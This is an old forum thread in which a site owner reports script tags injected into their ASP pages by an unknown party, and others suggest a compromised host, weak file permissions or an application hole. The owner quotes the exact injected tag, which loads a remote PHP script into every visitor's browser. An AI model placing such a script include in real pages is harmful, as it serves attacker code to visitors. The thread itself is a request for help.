0

Hi,

I just came across a piece of script that has been put into my source code throughout the site...and not by me.

Im not sure how they did it but im fearing this could get more serious and end up them hitting my db. Here is example(kind of) of the script im finding...

<script src="Http://www.domainname.com /a /a .php></script>

HELP!!!!!!

3
Contributors
5
Replies
6
Views
8 Years
Discussion Span
Last Post by meohoang194
0

I'd check your database for rouge entries, users.

Double-check your file permissions, and if your on a shared host, it might be a bad security setup in the host, allowing access to the files. Are these scripts served from the db or are they in the source files?

Do you have a better example of the scripts? (and the domain, if the site is in production, would be useful).

0

I'd check your database for rouge entries, users.

Double-check your file permissions, and if your on a shared host, it might be a bad security setup in the host, allowing access to the files. Are these scripts served from the db or are they in the source files?

Do you have a better example of the scripts? (and the domain, if the site is in production, would be useful).

Im using an external ISP to host the site. These scripts were put into the ASP. The DB seems to be untouched...for now.

This is the exact script that was entered into the site.

<script src=http://caplast.sk/galeria/profil.php ></script>

Im using google analytics which contains "Document.Write". Might they be using this to enter it into the pages?

0

See here:
Hi,

Já vi virus causando isso, como está acontecendo no provedor, trata-se de um virus nos servidores do provedor. I have seen virus causing it, as is happening in the provider, it is a virus on the servers of the provider.

O problema é que nunca admitem, se pelo menos resolverem, ótimo, do contrário o jeito é trocar de provedor. The problem is that they never admit, at least resolve, great, otherwise we'll just switch to another provider.

http://translate.google.com/translate?hl=en&sl=pt&u=http://social.msdn.microsoft.com/Forums/pt-BR/aspnetpt/thread/59bc348f-237b-4692-9fac-d8e7c55e6430&ei=b7rgSuCfNpSwMKzN7cII&sa=X&oi=translate&resnum=2&ct=result&ved=0CA8Q7gEwAQ&prev=/search%3Fq%3Dhttp://caplast.sk/galeria/profil.php%26hl%3Den%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26hs%3DQ0O
Providers try to push the blame on you (saying it is flawed for its application), but if your application is not capable of uploading files, it is virtually impossible to modify the files in your application - to change, your ISP also has a much great fault.

Also, it might be a hole in your application. Is it online now?

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.